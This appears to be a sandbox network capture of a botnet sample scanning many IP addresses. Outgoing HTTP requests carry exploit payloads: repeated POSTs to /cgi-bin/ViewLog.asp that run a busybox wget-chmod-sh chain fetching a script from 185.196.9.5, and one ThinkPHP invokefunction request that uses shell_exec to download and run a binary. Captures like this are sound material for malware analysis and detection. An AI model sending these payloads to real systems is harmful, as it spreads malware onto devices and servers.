Feb 25, 2024 19:03:28.555195093 CET	1286	IN	Data Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
Feb 25, 2024 19:03:28.555212975 CET	1286	IN	Data Raw: 74 6f 20 63 31 34 2e 74 65 7a 2e 68 6f 73 74 27 73 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 73 65 72 76 65 72 40 74 61 69 7a 68 6f 73 74 2e 63 6f 6d 3f 73 75 62 6a 65 63 74 3d 45 72 72 6f 72 20 6d 65 73 73 61 67 65 20 5b 34 30 30 5d 20 Data Ascii: to c14.tez.host's <a href="mailto:server@taizhost.com?subject=Error message [400] (none) for (none)/index.php?s=/index/ port 80 on Sunday, 25-Feb-2024 19:03:28 CET"> WebMaster</a>. </section> <p class="reason-text">You
Feb 25, 2024 19:03:28.557286978 CET	148	IN	Data Raw: 69 76 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 31 36 20 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 Data Ascii: iv class="copyright">Copyright 2016 cPanel, Inc.</div> </a> </div> </footer> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
392	192.168.2.15	35628	94.130.90.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:28.957917929 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:29.141794920 CET	182	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 25 Feb 2024 18:03:29 GMT Content-Type: text/html Content-Length: 665 Connection: keep-alive ETag: "65db33bd-299"

Session ID	Source IP	Source Port	Destination IP	Destination Port
393	192.168.2.15	33094	31.136.211.53	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:28.960448980 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:32.069885015 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:38.213855028 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:50.245723009 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:15.845666885 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:04.997044086 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
394	192.168.2.15	47292	95.167.225.153	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:28.992948055 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:29.212184906 CET	990	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: ru Content-Length: 794 Date: Sun, 25 Feb 2024 18:03:29 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 d0 9d d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 35 33 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="ru"><head><title>HTTP Status 404 </title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 </h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/cgi-bin/ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.53</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
395	192.168.2.15	52444	94.122.15.27	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:28.997699022 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
396	192.168.2.15	38090	94.122.229.220	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:28.998217106 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
397	192.168.2.15	33392	94.122.195.12	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.212944031 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
398	192.168.2.15	42376	62.29.81.158	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.217283964 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
399	192.168.2.15	53902	94.122.207.74	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.218609095 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
400	192.168.2.15	40130	31.200.125.212	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.224874973 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
401	192.168.2.15	59330	112.65.65.138	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.875241041 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:30.195486069 CET	303	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Sun, 25 Feb 2024 18:03:30 GMT Content-Type: text/html Content-Length: 154 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
402	192.168.2.15	40694	95.154.195.119	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.935476065 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:30.104846954 CET	497	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 303 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 31 39 36 2e 39 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at 185.196.9.5 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
403	192.168.2.15	41878	94.121.213.245	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.987719059 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
404	192.168.2.15	53794	94.121.211.7	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.987720013 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
405	192.168.2.15	59504	62.29.4.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.990067005 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
406	192.168.2.15	44102	94.123.148.159	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.990086079 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
407	192.168.2.15	47886	94.121.112.136	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.990113974 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
408	192.168.2.15	45074	95.86.109.195	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:29.991256952 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
409	192.168.2.15	39976	31.3.108.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:30.117115021 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
